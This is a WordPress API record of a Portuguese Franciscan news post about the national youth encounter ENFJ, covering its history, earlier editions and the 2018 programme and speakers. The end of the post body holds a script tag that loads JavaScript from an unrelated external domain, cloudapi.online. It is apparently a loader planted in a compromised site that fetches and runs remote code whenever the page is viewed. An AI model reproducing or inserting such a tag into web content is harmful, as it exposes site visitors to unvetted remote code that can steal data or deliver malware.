{"id":166685,"date":"2018-07-17T06:55:24","date_gmt":"2018-07-17T09:55:24","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=166685"},"modified":"2019-07-09T10:40:41","modified_gmt":"2019-07-09T13:40:41","slug":"encontro-franciscano-reune-jovens-de-todo-o-brasil","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html","title":{"rendered":"Encontro franciscano re\u00fane jovens de todo o Brasil"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-207494\" src=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09.jpg\" alt=\"\" width=\"890\" height=\"593\" srcset=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09.jpg 890w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09-450x300.jpg 450w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09-768x512.jpg 768w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09-150x100.jpg 150w\" sizes=\"(max-width: 890px) 100vw, 890px\" \/><\/p>\n<p>Promovido pela Confer\u00eancia dos Frades Menores do Brasil, o Encontro Nacional Franciscano de Juventudes (ENFJ) re\u00fane jovens de todo o pa\u00eds para uma experi\u00eancia de conviv\u00eancia fraterna, ora\u00e7\u00e3o, viv\u00eancia da espiritualidade e dos valores franciscanos. \u00c9, antes de tudo, um momento especial para fortalecimento dos la\u00e7os e de renova\u00e7\u00e3o do ideal que nos une e motiva. \u00c9 uma oportunidade de partilha daquilo que o Senhor tem feito e realizado por meio dos\/das jovens de todo o Brasil, bem como dos desafios que enfrentam em suas realidades muitas vezes t\u00e3o similares e, ao mesmo tempo, t\u00e3o distintas.<\/p>\n<p>Esse evento surgiu da necessidade de se ter uma aproxima\u00e7\u00e3o maior entre os frades e os jovens. Em 2008, em C\u00f3rdoba, na Argentina, realizou-se o Congresso Mission\u00e1rio, onde foi debatida a import\u00e2ncia da presen\u00e7a franciscana entre os jovens e as atuais dificuldades na evangeliza\u00e7\u00e3o. Desse modo, decidiu-se realizar um grande encontro nacional voltado para os jovens representantes das par\u00f3quias e fraternidades franciscanas, como uma primeira tentativa de ouvi-los, entend\u00ea-los e aproximar-se deles.<br \/>\nO ENFJ \u00e9, ent\u00e3o, um encontro entre jovens, frades, religiosas, leigos e leigas que se sentem unidos pela espiritualidade franciscana, para que, reunidos como fam\u00edlia para estreitar os la\u00e7os e percorrerem juntos os caminhos da evangeliza\u00e7\u00e3o, possam debater e aprofundar os temas e as dificuldades atuais do mundo juvenil.<\/p>\n<p><strong>1\u00ba ENFJ<\/strong><br \/>\nEsse primeiro encontro aconteceu em Canind\u00e9 &#8211; CE, no ano de 2011, e reuniu aproximadamente 540 jovens no Santu\u00e1rio de S\u00e3o Francisco das Chagas. Foram realizadas oficinas, partilhas, momentos de profunda espiritualidade e reflex\u00e3o acerca do tema \u201cJuventude, tua vida \u00e9 miss\u00e3o\u201d. A Missa de encerramento foi presidida pelo ent\u00e3o Ministro Geral da Ordem dos Frades Menores, Frei Jos\u00e9 Rodr\u00edguez Carballo, que tamb\u00e9m esteve durante todo o encontro ouvindo e partilhando sobre a caminhada dos jovens. Neste encontro, os jovens discutiram sobre v\u00e1rios temas, a saber: ecologia, evangeliza\u00e7\u00e3o a partir da arte.<\/p>\n<p><strong>2\u00ba ENFJ<\/strong><br \/>\nEntre os dias 9 e 12 de julho de 2015, na cidade de An\u00e1polis &#8211; GO, realizou-se o II ENFJ, com o tema \u201cJovens com Francisco seguindo Jesus Cristo\u201d e o lema \u201cVai e reconstr\u00f3i a minha Igreja\u201d. Neste encontro, os 450 participantes provenientes de todas as regi\u00f5es do pa\u00eds fizeram a experi\u00eancia de fortalecer a f\u00e9, conhecer o novo, aprofundar a espiritualidade franciscana e encontrar luzes para a sua caminhada.<br \/>\nDurante o encontro as juventudes refletiram que \u201ca juventude comprometida com Cristo deve ter coragem para abra\u00e7ar propostas positivas perante os grandes desafios da atualidade, tais como: o atual modelo econ\u00f4mico que gera exclus\u00e3o, o exterm\u00ednio de jovens, a cultura do descart\u00e1vel, a destrui\u00e7\u00e3o da natureza e as injusti\u00e7as sociais.\u201d (Carta aberta do II ENJF). Al\u00e9m disso, concluiu-se que toda essa mudan\u00e7a esperada somente \u00e9 poss\u00edvel mediante um engajamento pol\u00edtico na busca da transforma\u00e7\u00e3o da sociedade. Por fim, os jovens reafirmaram o seu desejo de apresentar a esse mundo a pessoa do Cristo da Esperan\u00e7a colocando-se ao lado dos crucificados de nosso tempo.<br \/>\nO 3\u00b0 ENFJ ser\u00e1 de 19 a 22 de julho de 2018, na cidade de Vila Velha &#8211; ES. O tema ser\u00e1 \u201cE o des\u00e2nimo se converteu em ardor: permanece conosco, Senhor.\u201d (Lc 24,29). Tendo em vista que estamos vivendo o ano do S\u00ednodo da Juventude, proposto pelo Papa Francisco, esse encontro ser\u00e1 de extrema import\u00e2ncia para repensarmos a nossa caminhada de juventudes.<\/p>\n<p><strong>COMO SER\u00c1?<\/strong><br \/>\nNessa 3\u00aa edi\u00e7\u00e3o, o Encontro Nacional ter\u00e1 um diferencial que certamente ir\u00e1 marcar a vida de todos os jovens. Assim, seguindo a metodologia de Ema\u00fas e atendendo ao pedido do Papa Francisco de que sejamos uma Igreja em sa\u00edda, nosso encontro, al\u00e9m de momentos de forma\u00e7\u00e3o, m\u00edstica, partilha e reflex\u00e3o, tamb\u00e9m proporcionar\u00e1 uma atividade concreta aos participantes. Teremos um momento para visitar as fam\u00edlias das comunidades da Par\u00f3quia Nossa Senhora do Ros\u00e1rio, sede do Encontro, conhecendo, assim, um pouco da realidade social e eclesial de Vila Velha.<br \/>\nAl\u00e9m disso, o objetivo \u00e9 fazer desse encontro uma oportunidade de miss\u00e3o concreta, de modo que anunciemos a Boa Nova de Jesus para outras pessoas, tal qual os disc\u00edpulos de Ema\u00fas que, depois de terem reconhecido Jesus ao partir o p\u00e3o, voltaram para a Galileia como verdadeiras testemunhas do Ressuscitado.<\/p>\n<p><strong>MOMENTO SOBRE MISS\u00c3O<\/strong><br \/>\nDentro da programa\u00e7\u00e3o, foi pensado para o dia 20 um momento que ajude nossos\/as jovens a refletir o sentido da Miss\u00e3o, a partir do que o pr\u00f3prio tema deste Encontro nos sugere que assumamos. Tendo presente um dos objetivos principais deste Encontro, o momento de Roda Viva (mesa-redonda), para o qual queremos contar com sua ajuda, visa despertar na juventude presente o desejo de sair em miss\u00e3o, atrav\u00e9s da reflex\u00e3o e das provoca\u00e7\u00f5es sua e dos demais envolvidos na constru\u00e7\u00e3o dessa \u2018viv\u00eancia\u2019, como tamb\u00e9m atrav\u00e9s do testemunho mission\u00e1rio de outros\/as irm\u00e3os convidados.<br \/>\nA Roda Viva foi pensada pela Comiss\u00e3o Central do Encontro para ser assim constitu\u00edda: cada participante ter\u00e1 25 minutos para expor seu \u2018eixo\u2019 de reflex\u00e3o, que ser\u00e1 conduzido a partir da metodologia VER \u2013 ILUMINAR \u2013 AGIR. Logo ap\u00f3s a explana\u00e7\u00e3o feita por todos, teremos um trabalho em plen\u00e1ria, onde abriremos para a participa\u00e7\u00e3o ativa e direta dos nossos jovens: ecos da mesa redonda, resson\u00e2ncias, inquieta\u00e7\u00f5es, d\u00favidas, perguntas, intera\u00e7\u00e3o, concluindo com a complementa\u00e7\u00e3o e provoca\u00e7\u00f5es finais por parte dos assessores.<\/p>\n<p><strong>Composi\u00e7\u00e3o da Roda Viva:<\/strong><br \/>\ntr\u00eas pessoas; 25 minutos cada<br \/>\n<strong>VER:<\/strong> Hildete Emanuele (PJ \u2013 Salvador\/BA): \u2013 Os rostos e realidades juvenis<br \/>\n<strong>ILUMINAR:<\/strong> Frei Pedro Junior, OFM (PFSAB \u2013 Campina Grande\/PB): \u2013 A Ilumina\u00e7\u00e3o B\u00edblica<br \/>\n<strong>AGIR:<\/strong> Carlos Neto (Bauru\/SP): \u2013 Testemunho com os tra\u00e7os de Francisco<br \/>\n<strong>INTERMEDIAR:<\/strong> Frei Toni Michels, OFM (PFICB \u2013 Baixada\/Rio de Janeiro)<\/p>\n<p><strong>Momento #pazebem:<\/strong><br \/>\nAp\u00f3s os trabalhos em grupos (miss\u00e3o e por entidade) teremos esse momento de interatividade com os jovens envolvendo brincadeiras, din\u00e2micas, tarefas-rel\u00e2mpago, encena\u00e7\u00f5es, etc. Trata-se de uma forma descontra\u00edda (no estilo Altas Horas) de os jovens questionarem e interagirem com os 3 assessores convidados (Hildete, Frei Pedro J\u00fanior e Carlos Neto). Moderador: Frei Zeca, TOR (SP)<br \/>\nComo experi\u00eancia \u00edmpar a ser proporcionada, \u00e9 importante destacar que nossos jovens vivenciar\u00e3o uma experi\u00eancia concreta de miss\u00e3o, que ser\u00e1 realizada no dia seguinte (s\u00e1bado). Dentro do que foi pensado para a programa\u00e7\u00e3o, teremos partilha de algumas experi\u00eancias que testemunham diversos \u2018rostos da miss\u00e3o\u2019.<br \/>\nEsse momento dever\u00e1 motivar e encorajar os nossos jovens a irem em miss\u00e3o, nas diversas realidades que eles ir\u00e3o visitar, no per\u00edodo da tarde daquele mesmo dia.<br \/>\nPara este momento, que acontecer\u00e1 no dia 21 de julho, das 10h \u00e0s 11h, est\u00e3o sendo convidados os seguintes irm\u00e3os, que ter\u00e3o 20 minutos, cada um deles para dar um breve testemunho mission\u00e1rio a partir da sua pr\u00f3pria realidade: Frei Jo\u00e3o Messias, OFM (Miss\u00e3o Munduruku &#8211; PA); Mariana Rogosky (Curitiba &#8211; PR); e Washington Lima, Jufra (Secret\u00e1rio Nacional da JUFRA &#8211; SE).<br \/>\nEnquanto Comiss\u00e3o Central deste Encontro, que tem como objetivo garantir a harmonia e flu\u00eancia do III ENFJ, a fim de converter em ardor e testemunho as diversas experi\u00eancias juvenis no \u00e2mbito da CFMB, estamos certos de que sua participa\u00e7\u00e3o e colabora\u00e7\u00e3o ser\u00e3o de fundamental import\u00e2ncia para nos ajudar a construir mais esse momento de gra\u00e7a que o Cristo Ressuscitado nos convida a viver!<\/p>\n<p><em>Frei Diego Atalino, OFM<\/em><br \/>\n<em> Frei Wellington Buarque, OFM<\/em><br \/>\n<em> Juliana Caroline<\/em><br \/>\n<em> Rafael Corr\u00eaa<\/em><br \/>\n<em> Comiss\u00e3o Nacional &#8211; 3\u00ba ENFJ<\/em><\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/07\/explica_170718.jpg\" alt=\"explica_170718\" width=\"830\" height=\"591\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ENFJ<\/p>\n","protected":false},"author":1,"featured_media":207496,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[240,587],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"ENFJ\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-17T09:55:24+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-07-09T13:40:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html\",\"name\":\"Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#primaryimage\"},\"datePublished\":\"2018-07-17T09:55:24+00:00\",\"dateModified\":\"2019-07-09T13:40:41+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Encontro franciscano re\u00fane jovens de todo o Brasil\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html","og_locale":"pt_BR","og_type":"article","og_title":"Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos","og_description":"ENFJ","og_url":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-07-17T09:55:24+00:00","article_modified_time":"2019-07-09T13:40:41+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/enerf_09d.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html","name":"Encontro franciscano re\u00fane jovens de todo o Brasil - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#primaryimage"},"datePublished":"2018-07-17T09:55:24+00:00","dateModified":"2019-07-09T13:40:41+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-franciscano-reune-jovens-de-todo-o-brasil.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Encontro franciscano re\u00fane jovens de todo o Brasil"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/166685"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=166685"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/166685\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/207496"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=166685"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=166685"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=166685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}